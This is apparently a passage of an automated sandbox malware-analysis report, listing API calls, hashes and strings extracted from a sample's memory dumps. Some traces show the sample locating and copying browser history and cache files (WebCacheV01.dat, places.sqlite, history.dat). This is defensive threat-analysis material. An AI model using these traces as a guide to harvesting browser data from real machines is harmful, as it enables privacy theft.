                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                                                    • API String ID: 1714573020-3385500049
                                                                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004087D6
                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                    • memset.MSVCRT ref: 00408828
                                                                                                    • memset.MSVCRT ref: 00408840
                                                                                                    • memset.MSVCRT ref: 00408858
                                                                                                    • memset.MSVCRT ref: 00408870
                                                                                                    • memset.MSVCRT ref: 00408888
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 2911713577-0
                                                                                                    • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                    • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                    APIs
                                                                                                    • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp
                                                                                                    • String ID: @ $SQLite format 3
                                                                                                    • API String ID: 1475443563-3708268960
                                                                                                    • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                    • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmpqsort
                                                                                                    • String ID: /nosort$/sort
                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                    • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                    • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040E60F
                                                                                                    • memset.MSVCRT ref: 0040E629
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    Strings
                                                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                    • API String ID: 2887208581-2114579845
                                                                                                    • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                    • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                    APIs
                                                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3473537107-0
                                                                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                    APIs
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00910048), ref: 0044DF01
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00920050), ref: 0044DF11
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00A26EA0), ref: 0044DF21
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00920458), ref: 0044DF31
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                    • API String ID: 2221118986-1725073988
                                                                                                    • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                    • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                    APIs
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                    • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@DeleteObject
                                                                                                    • String ID: r!A
                                                                                                    • API String ID: 1103273653-628097481
                                                                                                    • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                    • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1033339047-0
                                                                                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                    APIs
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                    • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$memcmp
                                                                                                    • String ID: $$8
                                                                                                    • API String ID: 2808797137-435121686
                                                                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                      • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                    • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                      • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1979745280-0
                                                                                                    • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                    • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                    APIs
                                                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                      • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                    • free.MSVCRT ref: 00418803
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1355100292-0
                                                                                                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                    • memset.MSVCRT ref: 00403A55
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                    • String ID: history.dat$places.sqlite
                                                                                                    • API String ID: 2641622041-467022611
                                                                                                    • Opcode ID: 5bee45cdb6d082daa32fce0b5ea4b1357e7f956e37a37acc92fd9a7c9172319e
                                                                                                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                    • Opcode Fuzzy Hash: 5bee45cdb6d082daa32fce0b5ea4b1357e7f956e37a37acc92fd9a7c9172319e
                                                                                                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                    APIs
                                                                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                    • GetLastError.KERNEL32 ref: 00417627
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$File$PointerRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 839530781-0
                                                                                                    • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                    • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
